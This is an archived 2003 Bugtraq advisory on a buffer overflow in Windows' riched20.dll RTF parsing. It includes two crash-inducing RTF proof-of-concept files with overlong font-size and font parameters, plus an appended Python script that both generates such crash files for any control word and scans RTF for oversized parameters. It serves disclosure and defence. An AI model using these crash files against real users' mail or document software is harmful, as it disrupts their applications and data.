Bugtraq mailing list archives

Riched20.DLL attribute label buffer overflow vulnerability


From: Jie Dong <Thkrdev () yoursft com>
Date: 16 Feb 2003 13:30:50 -0000



================================================================================
Security Defence Stdio vulnerability announcement [001]
Riched20.DLL attribute label buffer overflow vulnerability
URL: http://www.yoursft.com
Author: Thkrdev
Found: 2003-02-01
Announced: 2003-02-14

Affected systems:  Microsoft Windows 98
                   Microsoft Windows 2000
                   Microsoft Windows XP
                   Other operating systems may also be affected, but they
                   were not tested.
EMAIL:    Thkrdev () yoursft com
------------------------------------------------------------------------
Technical description:
  A buffer overflow exists in riched20.dll. It crashes any application
that uses the affected function of the DLL module, but it is very
difficult to turn it into execution of attacker-supplied commands on the
user's system.

  The problem lies in the RTF parsing code: a numeric attribute value in
the file (such as a character size) overflows a buffer when the text is
drawn. This overflow does not appear to be usable for executing commands.

  The following RTF file causes an illegal operation:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
"\fs" sets the size of the words that follow it ("www.yoursft.com"). When
the digit string giving the font size exceeds 1024 bytes (>1024b) it
causes the buffer overflow, and when it exceeds 65536 bytes (>65536b) it
will probably crash the application.
This problem is not limited to "\fs": other attributes have the same
problem in a similar situation. The following RTF file also causes an
illegal operation:
   {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222
\fs180 www.yoursft.com\fs20\par
}
The alarming thing is that a lot of software in use today is affected by
this vulnerability. An attacker can send a malicious message that exploits
it, and your program crashes when you read that message.
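As an added example (not part of the advisory or its author's code), the following Python script does two things a practitioner would want from this description: it builds RTF files with the advisory's skeleton for any control word and any parameter string, generalizing the page's "\fs" and "\f" cases, and it scans RTF text for control-word parameters that exceed the advisory's 1024-byte and 65536 thresholds. The advisory does not say whether those numbers refer to the length of the digit string or to its numeric value, so the scanner checks both; that interpretation, the MAX_* constants and the build_poc/find_oversized names are assumptions of this example.

```python
import re

# RTF control word: a backslash, a run of ASCII letters, then an optional
# signed decimal parameter (e.g. \fs18, \f0, \deflangfe2052).
CONTROL_WORD = re.compile(r"\\([A-Za-z]+)(-?[0-9]+)?")

# The advisory's first proof-of-concept file, copied from the page.
PAGE_POC = (
    r"{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0"
    r"\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}"
    r"{\colortbl ;\red255\green0\blue255;}"
    r"\viewkind4\uc1\pard\cf1\kerning2\f0"
    r"\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par"
    "}"
)

# Thresholds quoted in the advisory. Whether they mean digit count or
# numeric value is not stated, so both are checked (assumption).
MAX_PARAM_DIGITS = 1024
MAX_PARAM_VALUE = 65536


def control_words(rtf):
    """Yield (word, parameter_text_or_None) for each control word in rtf."""
    for m in CONTROL_WORD.finditer(rtf):
        yield m.group(1), m.group(2)


def find_oversized(rtf, max_digits=MAX_PARAM_DIGITS, max_value=MAX_PARAM_VALUE):
    """Return [(word, digit_count, reason)] for every control word whose
    parameter is longer than max_digits characters ("length") or whose
    numeric value exceeds max_value ("value").  The value test compares
    digit counts before calling int(), so huge strings are cheap."""
    hits = []
    for word, param in control_words(rtf):
        if param is None:
            continue
        raw = param.lstrip("-")
        if len(raw) > max_digits:
            hits.append((word, len(raw), "length"))
            continue
        digits = raw.lstrip("0") or "0"
        if len(digits) > len(str(max_value)) or int(digits) > max_value:
            hits.append((word, len(raw), "value"))
    return hits


def build_poc(word, param, text="www.yoursft.com"):
    """Build an RTF file with the advisory's skeleton, attaching the
    parameter string `param` to control word `word` directly before
    `text`.  The advisory's own files use word="fs" and word="f"; any
    other attribute can be tried the same way."""
    if not re.fullmatch(r"[A-Za-z]+", word) or not re.fullmatch(r"-?[0-9]+", param):
        raise ValueError("word must be letters, param must be decimal digits")
    return (
        r"{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0"
        r"\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}"
        r"{\colortbl ;\red255\green0\blue255;}"
        r"\viewkind4\uc1\pard\cf1\kerning2\f0"
        "\\" + word + param + " " + text + r"\fs20\par}"
    )


if __name__ == "__main__":
    # The page's own file trips the value check (its \fs parameter is a
    # few dozen digits, far above 65536) but not the 1024-byte length check.
    print(find_oversized(PAGE_POC))
    # A 2000-digit parameter trips the length check; write the returned
    # string to a .rtf file to test an application under a debugger.
    print(find_oversized(build_poc("fs", "1" * 2000)))
```

The scanner is deliberately tolerant: it does not validate RTF grouping or escapes, only the control-word syntax, because a mail or document gateway only needs to spot the overlong digit run, not render the file.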
  
------------------------------------------------------------------------
Security Defence Stdio is a software development / technology website,
mainly developing network security products; its software, Trojan Ender,
has received extensive favorable comment from users.




